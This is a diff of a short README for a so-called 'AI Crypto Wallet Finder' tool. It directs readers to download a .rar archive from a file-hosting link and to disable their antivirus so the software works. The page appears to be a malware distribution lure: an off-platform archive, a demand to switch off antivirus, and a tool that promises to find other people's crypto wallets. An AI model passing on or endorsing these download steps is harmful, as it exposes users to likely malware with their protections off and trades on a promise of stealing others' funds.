devofcrypto/AI-Crypto-Wallet-Finder-2025/README.md

 WalletFisher - AI Crypto Wallet Finder

-** download Wallet hunter 2025.rar file from this link :https://www.upload.ee/files/18139099/Fast_crypto_finder_2025_.rar.html
+** download file from this link :https://www.upload.ee/files/18139099/Fast_crypto_finder_2025_.rar.html
 -  ( disable your anti virus to work well )
 - and if the software not open download ( net freamwork 3.5 and 4.5)